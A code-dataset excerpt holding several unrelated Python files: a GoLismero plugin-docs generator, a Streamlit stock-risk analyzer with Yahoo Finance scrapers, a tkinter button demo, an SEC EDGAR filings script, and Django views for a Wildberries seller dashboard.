sys.path.insert(0, thirdparty_libs)\n sys.path.insert(0, golismero)\n\nfrom golismero.api.plugin import get_plugin_type_display_name, get_plugin_type_description\nfrom golismero.managers.pluginmanager import PluginManager\nfrom golismero.common import OrchestratorConfig\n\ncategories = (\"import\", \"recon\", \"scan\", \"attack\", \"intrude\", \"cleanup\", \"report\", \"ui\")\n\nindex = \"\"\"List of plugins\n===============\n\nThese are the plugins shipped by default with GoLismero:\n\n.. toctree::\n :maxdepth: 2\n\n\"\"\".replace(\"\\r\\n\", \"\\n\")\n\ndef gen():\n pluginManager = PluginManager()\n pluginManager.find_plugins( OrchestratorConfig() )\n for plugin_type in categories:\n with open(path.join(here, plugin_type + \".rst\"), \"w\") as f:\n name = get_plugin_type_display_name(plugin_type)\n print >>f, name\n print >>f, \"*\" * len(name)\n print >>f, \"\"\n print >>f, get_plugin_type_description(plugin_type)\n print >>f, \"\"\n plugins = pluginManager.get_plugins(plugin_type)\n if plugins:\n for plugin_id in sorted(plugins.keys()):\n plugin_info = plugins[plugin_id]\n display_name = \"%s (*%s*)\" % (plugin_info.display_name, plugin_id[plugin_id.rfind(\"/\")+1:])\n description = plugin_info.description\n description = description.replace(\"\\r\\n\", \"\\n\")\n description = description.replace(\"\\n\", \"\\n\\n\")\n print >>f, display_name\n print >>f, \"=\" * len(display_name)\n print >>f, \"\"\n print >>f, description\n print >>f, \"\"\n if plugin_info.plugin_args:\n width_key = 17\n width_value = 17\n for key, value in plugin_info.plugin_args.iteritems():\n if key in plugin_info.plugin_passwd_args:\n value = \"\\\\*\" * 16\n width_key = max(width_key, len(key))\n width_value = max(width_value, len(value))\n print >>f, \"%s %s\" % ((\"=\" * width_key), (\"=\" * width_value))\n print >>f, (\"**Argument name**%s **Default value**%s\" % ((\" \" * (width_key - 17)), (\" \" * (width_value - 17)))).rstrip()\n print >>f, \"%s %s\" % ((\"-\" * width_key), (\"-\" * width_value))\n for key, value in plugin_info.plugin_args.iteritems():\n value = value.replace(\"\\r\\n\", \"\\n\")\n value = value.replace(\"\\n\", \" \")\n if key in plugin_info.plugin_passwd_args:\n value = \"\\\\*\" * 16\n pad_key = (\" \" * (width_key - len(key)))\n pad_value = (\" \" * (width_value - len(value)))\n print >>f, (\"%s%s %s%s\" % (key, pad_key, value, pad_value)).rstrip()\n print >>f, (\"%s %s\" % ((\"=\" * width_key), (\"=\" * width_value))).rstrip()\n print >>f, \"\"\n else:\n print >>f, \"There are currently 
no plugins in this category.\"\n print >>f, \"\"\n with open(path.join(here, plugin_type + \".rst\"), \"rU\") as f:\n data = f.read()\n with open(path.join(here, plugin_type + \".rst\"), \"wb\") as f:\n f.write(data)\n with open(\"index.rst\", \"wb\") as f:\n f.write(index)\n for plugin_type in categories:\n f.write(\" %s\\n\" % plugin_type)\n\nif __name__ == '__main__':\n gen()\n","repo_name":"golismero/golismero","sub_path":"doc/plugins/source/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","stars":838,"dataset":"github-code","pt":"75"} +{"seq_id":"24008319118","text":"# import packages\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nfrom copy import copy\nfrom scipy import stats\nimport plotly.express as px\nimport plotly.figure_factory as ff\nimport plotly.graph_objects as go\nimport datetime\nimport pandas as pd\nimport yfinance as yf\nimport plotly.graph_objects as go\nimport streamlit as st\nimport datetime\nimport pandas as pd\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nfrom copy import copy\nfrom scipy import stats\nimport plotly.express as px\nimport plotly.figure_factory as ff\nimport plotly.graph_objects as go\nimport yfinance as yf\nimport plotly.graph_objects as go\nimport streamlit as st\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport datetime\nfrom scipy.stats import norm\nimport requests\nfrom bs4 import BeautifulSoup\nimport cufflinks as cf\n\ncf.go_offline()\nfrom lxml import html\nimport requests\nimport numpy as np\nimport pandas as pd\nimport os\n#import talib\nimport datetime\nimport pandas as pd\nimport yfinance as yf\n\nfrom arch import arch_model\n#from arch.__future__ import reindexing\nimport math\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nimport numpy as np\nfrom io import StringIO\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport pandas_datareader\nimport datetime\nimport pandas_datareader.data as web\nfrom scipy.stats import norm\n\n\n\n\nst.title(\"Welcome To Stock Ticker Analyzer\")\n\n\n\n\nclass ValueAtRiskMonteCarlo:\n\n def __init__(self, S, mu, sigma, c, n, iterations):\n self.S = S\n self.mu = mu\n self.sigma = sigma\n self.c = c\n self.n = n\n self.iterations = iterations\n\n def simulation(self):\n stock_data = np.zeros([self.iterations, 1])\n rand = np.random.normal(0, 1, [1, self.iterations])\n\n # equation for the S(t) stock price\n stock_price = self.S * np.exp(self.n * (self.mu - 0.5 * self.sigma ** 2) + self.sigma * np.sqrt(self.n) * rand)\n # we have to sort the stock prices to determine the percentile\n stock_price = np.sort(stock_price)\n\n # it depends on the confidence level: 95% -> 5 and 99% -> 1\n percentile = np.percentile(stock_price, (1 - self.c) * 100)\n\n return self.S - percentile\n\n\n\nticker = st.text_input('Enter Ticker EX:\"HCLTECH.NS\"',value=\"AARTIIND.NS\")\nbse = '^BSESN'\ntickers = [ticker,bse]\n\ndef cal_data(tickers):\n data = pd.DataFrame()\n for t in tickers:\n t = t.upper()\n data[t] = yf.download(t, period='4y')['Adj Close']\n sec_returns = np.log(data / data.shift(1))\n cov = sec_returns.cov() * 250\n cov_with_market = cov.iloc[0, 1]\n market_var = sec_returns[bse].var() * 250\n MSFT_beta = cov_with_market / market_var\n st.write(\"Beta is : {}\".format(MSFT_beta))\n returns = np.log(data / data.shift(1))\n\n vols = returns.std() * 250 ** 0.5 * 100\n st.write(\"Volatility is 
: {}\".format(vols))\n annual_returns = returns.mean() * 250 * 100\n st.write(\"Return is : {}\".format(annual_returns))\n sharpe_ratio = annual_returns[ticker] / vols[ticker]\n st.write(\"Shape Ratio : {}\".format(sharpe_ratio))\n CV = (vols / annual_returns) * 100\n st.write(\"CV : {}\".format(CV))\n\n\n\ndef CAGR(DF):\n \"function to calculate the Cumulative Annual Growth Rate of a trading strategy\"\n df = DF.copy()\n df[\"daily_ret\"] = DF[\"Adj Close\"].pct_change()\n df[\"cum_return\"] = (1 + df[\"daily_ret\"]).cumprod()\n n = len(df) / 252\n CAGR = (df[\"cum_return\"][-1]) ** (1 / n) - 1\n return CAGR\n\n\ndef volatility(DF):\n \"function to calculate annualized volatility of a trading strategy\"\n df = DF.copy()\n df[\"daily_ret\"] = DF[\"Adj Close\"].pct_change()\n vol = df[\"daily_ret\"].std() * np.sqrt(252)\n return vol\n\n\ndef sharpe(DF, rf):\n \"function to calculate sharpe ratio ; rf is the risk free rate\"\n df = DF.copy()\n sr = (CAGR(df) - rf) / volatility(df)\n return sr\n\n\ndef sortino(DF, rf):\n \"function to calculate sortino ratio ; rf is the risk free rate\"\n df = DF.copy()\n df[\"daily_ret\"] = DF[\"Adj Close\"].pct_change()\n neg_vol = df[df[\"daily_ret\"] < 0][\"daily_ret\"].std() * np.sqrt(252)\n sr = (CAGR(df) - rf) / neg_vol\n return sr\n\n\ndef max_dd(DF):\n \"function to calculate max drawdown\"\n df = DF.copy()\n df[\"daily_ret\"] = DF[\"Adj Close\"].pct_change()\n df[\"cum_return\"] = (1 + df[\"daily_ret\"]).cumprod()\n df[\"cum_roll_max\"] = df[\"cum_return\"].cummax()\n df[\"drawdown\"] = df[\"cum_roll_max\"] - df[\"cum_return\"]\n df[\"drawdown_pct\"] = df[\"drawdown\"] / df[\"cum_roll_max\"]\n max_dd = df[\"drawdown_pct\"].max()\n return max_dd\n\n\ndef calmar(DF):\n \"function to calculate calmar ratio\"\n df = DF.copy()\n clmr = CAGR(df) / max_dd(df)\n return clmr\n\ndef signals(dfnew):\n dfnew['50DMA'] = dfnew['Close'].rolling(window=50).mean()\n dfnew['200DMA'] = dfnew['Close'].rolling(window=200).mean()\n dfnew['crit1'] = dfnew['Close'] >= dfnew['200DMA']\n dfnew['cr12'] = (dfnew['50DMA'] >= dfnew['200DMA']) | dfnew['crit1'] == True\n st.dataframe(dfnew.tail(100),800,800)\n\n\ndf = pd.DataFrame()\ndf = yf.download(ticker, period='2y')\n\n\n\ncal_data(tickers)\n\ncg = CAGR(df)\nvola = volatility(df)\nshar = sharpe(df,0.06)\nsor = sortino(df,0.06)\nmd = max_dd(df)\ncalm = calmar(df)\n\nst.write(\"\\n The Compunded Annual Groth of the stock is {}%\".format(cg*100))\nst.write(\"\\n The Volatility of the stock is {}%\".format(vola*100))\nst.write(\"\\n The Sharp Ratio is: {}\".format(shar))\nst.write(\"\\n The Sortino Ratio is: {}\".format(sor))\nst.write(\"\\n The MAX Draw Down it shows loss for the investment {}%\".format(md*100))\nst.write(\"\\n The Calamr Ratio is(It shows the Risk Adjusted Return) : {}\".format(calm))\n\nst.header(\"Trading Signals\")\nsignals(df)\ndef monte_carlo(ticker):\n data = pd.DataFrame()\n data[ticker] = yf.download(ticker, period='2y')['Adj Close']\n log_returns = np.log(1 + data.pct_change())\n u = log_returns.mean()\n var = log_returns.var()\n drift = u - (0.5 * var)\n stdev = log_returns.std()\n\n\n\n t_intervals = 250\n iterations = 1000\n\n daily_returns = np.exp(drift.values + stdev.values * norm.ppf(np.random.rand(t_intervals, iterations)))\n S0 = data.iloc[-1]\n price_list = np.zeros_like(daily_returns)\n price_list[0] = S0\n for t in range(1, t_intervals):\n price_list[t] = price_list[t - 1] * daily_returns[t]\n st.header(\"MONTE CARLO SIMULATION:\")\n st.line_chart(price_list)\n st.header(\"The MAXIMUM PRICE 
OBTAINED FROM MONTE CARLO SIMULATION IS:\")\n a = price_list.max()\n a\n st.header(\"The MINIMUM PRICE OBTAINED FROM MONTE CARLO SIMULATION IS:\")\n\n b = price_list.min()\n b\n st.header(\"The MEAN PRICE OBTAINED FROM MONTE CARLO SIMULATION IS:\")\n c = price_list.mean()\n c\n st.write(\"Expected price: \", np.mean(price_list))\n st.write(\"Quantile (5%): \", np.percentile(price_list, 5))\n st.write(\"Quantile (95%): \", np.percentile(price_list, 95))\n\n plt.axvline(np.percentile(price_list,5), color='r', linestyle='dashed', linewidth=2)\n plt.axvline(np.percentile(price_list,95), color='r', linestyle='dashed', linewidth=2)\n fig, ax = plt.subplots()\n ax.hist(price_list,bins=100)\n st.pyplot(fig)\n\n\n\n\n\n\nmonte_carlo(ticker)\n\ndef balance_sheet(ticker):\n from datetime import datetime\n import lxml\n from lxml import html\n import requests\n import numpy as np\n import pandas as pd\n\n symbol = ticker\n\n url = 'https://finance.yahoo.com/quote/' + symbol + '/balance-sheet?p=' + symbol\n\n # Set up the request headers that we're going to use, to simulate\n # a request by the Chrome browser. Simulating a request from a browser\n # is generally good practice when building a scraper\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'en-US,en;q=0.9',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'close',\n 'DNT': '1', # Do Not Track Request Header\n 'Pragma': 'no-cache',\n 'Referrer': 'https://google.com',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36'\n }\n\n # Fetch the page that we're going to parse, using the request headers\n # defined above\n page = requests.get(url, headers=headers)\n\n # Parse the page with LXML, so that we can start doing some XPATH queries\n # to extract the data that we want\n tree = html.fromstring(page.content)\n\n # Smoke test that we fetched the page by fetching and displaying the H1 element\n tree.xpath(\"//h1/text()\")\n\n table_rows = tree.xpath(\"//div[contains(@class, 'D(tbr)')]\")\n\n # Ensure that some table rows are found; if none are found, then it's possible\n # that Yahoo Finance has changed their page layout, or have detected\n # that you're scraping the page.\n assert len(table_rows) > 0\n\n parsed_rows = []\n\n for table_row in table_rows:\n parsed_row = []\n el = table_row.xpath(\"./div\")\n\n none_count = 0\n\n for rs in el:\n try:\n (text,) = rs.xpath('.//span/text()[1]')\n parsed_row.append(text)\n except ValueError:\n parsed_row.append(np.NaN)\n none_count += 1\n\n if (none_count < 4):\n parsed_rows.append(parsed_row)\n\n df = pd.DataFrame(parsed_rows)\n st.dataframe(df,800,800)\n\ndef financials(ticker):\n from datetime import datetime\n import lxml\n from lxml import html\n import requests\n import numpy as np\n import pandas as pd\n\n symbol = ticker\n\n url = 'https://finance.yahoo.com/quote/' + symbol + '/financials?p=' + symbol\n\n # Set up the request headers that we're going to use, to simulate\n # a request by the Chrome browser. 
Simulating a request from a browser\n # is generally good practice when building a scraper\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'en-US,en;q=0.9',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'close',\n 'DNT': '1', # Do Not Track Request Header\n 'Pragma': 'no-cache',\n 'Referrer': 'https://google.com',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36'\n }\n\n # Fetch the page that we're going to parse, using the request headers\n # defined above\n page = requests.get(url, headers=headers)\n\n # Parse the page with LXML, so that we can start doing some XPATH queries\n # to extract the data that we want\n tree = html.fromstring(page.content)\n\n # Smoke test that we fetched the page by fetching and displaying the H1 element\n tree.xpath(\"//h1/text()\")\n\n table_rows = tree.xpath(\"//div[contains(@class, 'D(tbr)')]\")\n\n # Ensure that some table rows are found; if none are found, then it's possible\n # that Yahoo Finance has changed their page layout, or have detected\n # that you're scraping the page.\n assert len(table_rows) > 0\n\n parsed_rows = []\n\n for table_row in table_rows:\n parsed_row = []\n el = table_row.xpath(\"./div\")\n\n none_count = 0\n\n for rs in el:\n try:\n (text,) = rs.xpath('.//span/text()[1]')\n parsed_row.append(text)\n except ValueError:\n parsed_row.append(np.NaN)\n none_count += 1\n\n if (none_count < 4):\n parsed_rows.append(parsed_row)\n\n df = pd.DataFrame(parsed_rows)\n st.dataframe(df,800,800)\n\ndef cash_flow(ticker):\n from datetime import datetime\n import lxml\n from lxml import html\n import requests\n import numpy as np\n import pandas as pd\n\n symbol = ticker\n\n url = 'https://finance.yahoo.com/quote/' + symbol + '/cash-flow?p=' + symbol\n\n # Set up the request headers that we're going to use, to simulate\n # a request by the Chrome browser. 
Simulating a request from a browser\n # is generally good practice when building a scraper\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'en-US,en;q=0.9',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'close',\n 'DNT': '1', # Do Not Track Request Header\n 'Pragma': 'no-cache',\n 'Referrer': 'https://google.com',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36'\n }\n\n # Fetch the page that we're going to parse, using the request headers\n # defined above\n page = requests.get(url, headers=headers)\n\n # Parse the page with LXML, so that we can start doing some XPATH queries\n # to extract the data that we want\n tree = html.fromstring(page.content)\n\n # Smoke test that we fetched the page by fetching and displaying the H1 element\n tree.xpath(\"//h1/text()\")\n\n table_rows = tree.xpath(\"//div[contains(@class, 'D(tbr)')]\")\n\n # Ensure that some table rows are found; if none are found, then it's possible\n # that Yahoo Finance has changed their page layout, or have detected\n # that you're scraping the page.\n assert len(table_rows) > 0\n\n parsed_rows = []\n\n for table_row in table_rows:\n parsed_row = []\n el = table_row.xpath(\"./div\")\n\n none_count = 0\n\n for rs in el:\n try:\n (text,) = rs.xpath('.//span/text()[1]')\n parsed_row.append(text)\n except ValueError:\n parsed_row.append(np.NaN)\n none_count += 1\n\n if (none_count < 4):\n parsed_rows.append(parsed_row)\n\n df = pd.DataFrame(parsed_rows)\n st.dataframe(df,800,800)\n\ndef key_fianancials(ticker):\n import requests\n from bs4 import BeautifulSoup\n\n import requests\n from bs4 import BeautifulSoup\n\n url = \"https://finance.yahoo.com/quote/\"+ticker+ \"/key-statistics?p=\"+ticker\n\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\"\n }\n\n soup = BeautifulSoup(requests.get(url, headers=headers).content, \"html.parser\")\n\n for t in soup.select(\"table\"):\n for tr in t.select(\"tr:has(td)\"):\n for sup in tr.select(\"sup\"):\n sup.extract()\n tds = [td.get_text(strip=True) for td in tr.select(\"td\")]\n if len(tds) == 2:\n st.write(\"{:<50} {}\".format(*tds))\nst.header(\"Balance Sheet\")\nbalance_sheet(ticker)\nst.header(\"Key Financials\")\nfinancials(ticker)\nst.header(\"Cash Flow\")\ncash_flow(ticker)\nst.header(\"Key Indicators\")\nkey_fianancials(ticker)\n\n\n\n\n\n\nfig = go.Figure(\n data=[go.Candlestick(\n x=df.index,\n open=df['Open'],\n high=df['High'],\n low=df['Low'],\n close=df['Close'],\n increasing_line_color='green',\n decreasing_line_color='red'\n )]\n)\n\nst.subheader(\"Historical Prices\")\nst.write(df.head(15))\n\nst.subheader(\"Data Statistics\")\nst.write(df.describe())\n\nst.subheader(\"Historical Price Chart - Adjusted Close Price\")\nst.line_chart(df['Adj Close'])\n\nst.subheader(\"Volume\")\nst.bar_chart(df['Volume'])\n\nst.subheader(\"Candlestick Trend\")\n#d1 = candle_trend(df, patterns)\n#st.dataframe(d1)\n\nst.subheader(\"Candlestick Chart\")\nst.plotly_chart(fig)\n\ndef garch(stock_data):\n import math\n stock_data['Return'] = 100 * (stock_data['Close'].pct_change())\n stock_data.dropna(inplace=True)\n\n fig = plt.figure()\n fig.set_figwidth(12)\n plt.plot(stock_data['Return'], label='Daily Returns')\n plt.legend(loc='upper right')\n plt.title('Daily Returns Over Time')\n 
plt.show()\n st.pyplot(fig)\n daily_volatility = stock_data['Return'].std()\n st.write('Daily volatility: ', '{:.2f}%'.format(daily_volatility))\n\n monthly_volatility = math.sqrt(21) * daily_volatility\n st.write('Monthly volatility: ', '{:.2f}%'.format(monthly_volatility))\n\n annual_volatility = math.sqrt(252) * daily_volatility\n st.write('Annual volatility: ', '{:.2f}%'.format(annual_volatility))\n\n garch_model = arch_model(stock_data['Return'], p=1, q=1,\n mean='constant', vol='GARCH', dist='normal')\n\n gm_result = garch_model.fit(disp='off')\n st.dataframe(gm_result.params)\n\n print('\\n')\n\n gm_forecast = gm_result.forecast(horizon=5)\n st.dataframe(gm_forecast.variance[-1:])\n\n rolling_predictions = []\n test_size = 365\n\n for i in range(test_size):\n train = stock_data['Return'][:-(test_size - i)]\n model = arch_model(train, p=1, q=1)\n model_fit = model.fit(disp='off')\n pred = model_fit.forecast(horizon=1)\n rolling_predictions.append(np.sqrt(pred.variance.values[-1, :][0]))\n\n rolling_predictions = pd.Series(rolling_predictions, index=stock_data['Return'].index[-365:])\n\n plt.figure(figsize=(10, 4))\n plt.plot(rolling_predictions)\n plt.title('Rolling Prediction')\n plt.show()\n st.line_chart(rolling_predictions)\n\n\ngarch(df)\n\n\ndf['EWMA12'] = df['Close'].ewm(span=12,adjust=False).mean()\ndf['12-month-SMA'] = df['Close'].rolling(window=12).mean()\nst.line_chart(df[['Close','EWMA12','12-month-SMA']])\n","repo_name":"sudhinjac/Stock","sub_path":"port1.py","file_name":"port1.py","file_ext":"py","file_size_in_byte":17534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"27078077333","text":"#import class library so that everytime its called, you can call it as tk\nimport tkinter as tk\n\n#define a function to implement print function\ndef button_click():\n print(\"Button clicked!\")\n\n#create root window object\nroot = tk.Tk()\nroot.title(\"Button Example\")\n\n#create button object\n#three arguments in parameter; put button in root window, set the txt, \n#set function in which button will click for \nbutton = tk.Button(root,text=\"Click Me!\", command=button_click)\nbutton.pack()\n\n#keep root window open; call root object\nroot.mainloop()\n \n\n\n\n","repo_name":"danavasilchuk/HelloDana.py","sub_path":"button1010.py","file_name":"button1010.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"556950380","text":"from secedgar.cik_lookup import get_cik_map\r\nimport pandas as pd\r\nfrom secedgar.core import DailyFilings, QuarterlyFilings\r\nfrom datetime import date\r\n\r\ncik_map = get_cik_map()\r\ncik_map = pd.DataFrame.from_dict(cik_map['ticker'], orient='index')\r\n# cik_map.reset_index(inplace=True)\r\n# cik_map.columns = ['company_name', 'cik']\r\n# print(cik_map.company_name)\r\n# print(cik_map.index[0])\r\n\r\n# headers = {\r\n# \"User-Agent\": \"jo boulement jo@gmx.at\",\r\n# \"Accept-Encoding\": \"gzip, deflate\" \r\n# }\r\n\r\ndef get_company_a_filings(cik_map):\r\n for i in range(len(cik_map)):\r\n if (cik_map.index[i] == \"AAPL\"):\r\n print(cik_map.index[i])\r\n return cik_map.index[i] == \"AAPL\"\r\n # return cik_map.company_name == \"AAPL\"\r\n\r\n# get_company_a_filings(cik_map)\r\n\r\nd = QuarterlyFilings(year=2021,\r\n quarter=2,\r\n entry_filter=get_company_a_filings(cik_map),\r\n user_agent= \"jo boulement 
jo@gmx.at\")\r\n\r\nprint(d.get_urls())","repo_name":"luna-007/extra","sub_path":"edgar_test.py","file_name":"edgar_test.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21630216700","text":"import concurrent.futures\nimport datetime\nimport json\nimport logging\nimport pickle\nfrom multiprocessing.pool import ThreadPool\nfrom rest_framework.decorators import api_view\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nfrom loguru import logger\nfrom drf_yasg import openapi\nfrom drf_yasg.utils import swagger_auto_schema\nfrom _settings.settings import redis_client\nfrom wb.forms import ApiForm\nfrom wb.models import ApiKey\nfrom wb.services.filtering import (\n filter_marketplace_products,\n filter_warehouse_products,\n filtering_lambdas_marketplace,\n filtering_lambdas_warehouse,\n)\nfrom wb.services.json_encoder import ObjectDict\nfrom wb.services.marketplace import (\n get_marketplace_objects,\n update_marketplace_prices,\n update_marketplace_sales,\n update_warehouse_prices,\n)\nfrom wb.services.rest_client.standard_client import StandardApiClient\nfrom wb.services.search import search_warehouse_products\nfrom wb.services.sorting import (\n get_marketplaces_sorting,\n sort_marketplace_products,\n sort_products,\n sorting_lambdas,\n)\nfrom wb.services.statistics import get_sales_statistics, get_stock_statistics\nfrom wb.services.tools import api_key_required\nfrom wb.services.warehouse import (\n add_weekly_orders,\n add_weekly_sales,\n get_bought_products,\n get_ordered_products,\n get_stock_objects,\n get_stock_products, attach_images,\n)\n\n\ndef index(request):\n # https://images.wbstatic.net/portal/education/Kak_rabotat'_s_servisom_statistiki.pdf\n # https://suppliers-api.wildberries.ru/swagger/index.html\n # https://openapi.wb.ru/\n return render(request, \"index.html\", {})\n\n\n@login_required\n@api_key_required\ndef update_discount(request):\n tokens = ApiKey.objects.get(user=request.user)\n jwt_token = tokens.new_api\n x64_token = tokens.api\n timezone = 3 # Moscow time\n\n if not jwt_token:\n return HttpResponse(\"Нужно указать API-ключ!\")\n\n new_client = StandardApiClient(jwt_token)\n wb_id = request.GET.get(\"wb_id\")\n\n new_price = int(request.GET.get(\"new_price\"))\n if new_price:\n full_price = int(request.GET.get(\"full_price\"))\n new_discount = int(100 - new_price * 100 / full_price)\n logger.info(f\"Посчитана скидка в {new_discount}%\")\n else:\n new_discount = int(request.GET.get(\"new_discount\"))\n if new_discount is not None:\n success, message = new_client.update_discount(wb_id, new_discount)\n if success:\n redis_key = f\"{x64_token}:update_discount:{wb_id}\"\n now = datetime.datetime.now(\n datetime.timezone(datetime.timedelta(hours=timezone))\n )\n logger.info(f\"{now}, {datetime.datetime.now()}\")\n redis_value = pickle.dumps(\n {\n \"new_price\": new_price,\n \"new_discount\": new_discount,\n # A bit creepy way to introduce timezone +3 MSK\n \"modified_at\": datetime.datetime.now(\n datetime.timezone(datetime.timedelta(hours=timezone))\n ),\n }\n )\n redis_client.set(\n redis_key, redis_value, ex=60 * 60 * 24 * 14\n ) # Keep info about price change for 14 days\n return HttpResponse(f\"Установлена {new_discount}% скидка\")\n return HttpResponse(message)\n\n\n@login_required\n@api_key_required\ndef 
stock(request):\n \"\"\"Display products in stock.\"\"\"\n logger.info(\"View: requested stock\")\n statistics_token = ApiKey.objects.get(user=request.user.id).api\n standard_token = ApiKey.objects.get(user=request.user.id).new_api\n\n # Statistics have 3 requests that take 30+ seconds, so we start another thread pool here\n # Tread doesn't support return value!\n pool = ThreadPool(processes=1)\n async_result = pool.apply_async(get_sales_statistics, (statistics_token,))\n # and actually 3 more threads inside. Magic!\n\n # So here actually we have 4 concurrent requests\n products = get_stock_objects(statistics_token)\n products = add_weekly_sales(statistics_token, products)\n products = add_weekly_orders(statistics_token, products)\n products = update_warehouse_prices(statistics_token, products)\n products = attach_images(standard_token, products)\n products = list(products.values())\n\n sort_by = request.GET.get(\"sort_by\")\n\n products = sort_products(products, sort_by)\n\n filter_by = request.GET.get(\"filter_by\")\n if filter_by:\n products = filter_warehouse_products(products, filter_by)\n\n search_keyword = request.GET.get(\"search\")\n if search_keyword:\n products = search_warehouse_products(products, search_keyword)\n\n # Ready to paginate\n paginator = Paginator(products, 32)\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n\n # Get our statistics\n data = async_result.get()\n\n data[\"data\"] = page_obj\n data = data | get_stock_statistics(products)\n data[\"sorting_lambdas\"] = sorting_lambdas\n data[\"filtering_lambdas\"] = filtering_lambdas_warehouse\n\n return render(\n request,\n \"stock.html\",\n data,\n )\n\n\nx64_token = openapi.Parameter(\n \"x64_token\",\n openapi.IN_QUERY,\n description=\"x64_token https://seller.wb.ru/supplier-settings/access-to-api\",\n type=openapi.TYPE_STRING,\n)\njwt_token = openapi.Parameter(\n \"jwt_token\",\n openapi.IN_QUERY,\n description=\"jwt_token https://seller.wb.ru/supplier-settings/access-to-new-api\",\n type=openapi.TYPE_STRING,\n)\n\n\n@swagger_auto_schema(method=\"get\", manual_parameters=[x64_token])\n@api_view(http_method_names=[\"GET\"])\ndef api_stock(request):\n if \"x64_token\" not in request.GET:\n return JsonResponse({\"error\": \"x64_token is not provided\"})\n token = request.GET[\"x64_token\"]\n products = get_stock_objects(token)\n products = add_weekly_sales(token, products)\n products = add_weekly_orders(token, products)\n products = update_warehouse_prices(token, products)\n return JsonResponse(products, encoder=ObjectDict, json_dumps_params={\"indent\": 4})\n\n\n@login_required\n@api_key_required\ndef marketplace(request):\n \"\"\"Display products in marketplace.\"\"\"\n logger.info(\"View: requested marketplace\")\n tokens = ApiKey.objects.get(user=request.user)\n jwt_token = tokens.new_api\n x64_token = tokens.api\n\n # Statistics have 3 requests that take 30+ seconds, so we start another thread pool here\n # Tread doesn't support return value!\n pool = ThreadPool(processes=1)\n async_result = pool.apply_async(get_sales_statistics, (x64_token,))\n # and actually 3 more threads inside. 
Magic!\n\n # So here actually we have 4 concurrent requests\n products, barcode_hashmap = get_marketplace_objects(x64_token)\n products = update_marketplace_prices(x64_token, products)\n products = update_marketplace_sales(jwt_token, products, barcode_hashmap)\n products = attach_images(jwt_token, products)\n\n products = list(products.values())\n sort_by = request.GET.get(\"sort_by\")\n products = sort_marketplace_products(products, sort_by)\n\n filter_by = request.GET.get(\"filter_by\")\n if filter_by:\n products = filter_marketplace_products(products, filter_by)\n\n search_keyword = request.GET.get(\"search\")\n if search_keyword:\n products = search_warehouse_products(products, search_keyword)\n # Ready to paginate\n paginator = Paginator(products, 32)\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n\n # Get our weekly revenue and sales/orders\n data = async_result.get()\n\n data[\"data\"] = page_obj\n\n data = data | get_stock_statistics(products)\n data[\"sorting_lambdas\"] = get_marketplaces_sorting()\n data[\"filtering_lambdas\"] = filtering_lambdas_marketplace\n\n data[\"marketplace\"] = True\n\n return render(\n request,\n \"stock.html\",\n data,\n )\n\n\n@swagger_auto_schema(method=\"get\", manual_parameters=[x64_token, jwt_token])\n@api_view(http_method_names=[\"GET\"])\ndef api_marketplace(request):\n if \"x64_token\" not in request.GET or \"jwt_token\" not in request.GET:\n return JsonResponse({\"error\": \"x64_token or jwt_token are not provided\"})\n x64_token = request.GET[\"x64_token\"]\n jwt_token = request.GET[\"jwt_token\"]\n products, barcode_hashmap = get_marketplace_objects(x64_token)\n products = update_marketplace_prices(x64_token, products)\n products = update_marketplace_sales(jwt_token, products, barcode_hashmap)\n\n return JsonResponse(products, encoder=ObjectDict, json_dumps_params={\"indent\": 4})\n\n\n@login_required\n@api_key_required\ndef ordered(request):\n return render_page(get_ordered_products, request)\n\n\ndef render_page(function, request):\n # Statistics have 3 requests that take 30+ seconds, so we start another thread pool here\n # Tread doesn't support return value!\n token = ApiKey.objects.get(user=request.user.id).api\n pool = ThreadPool(processes=1)\n async_result = pool.apply_async(get_sales_statistics, (token,))\n # and actually 3 more threads inside. 
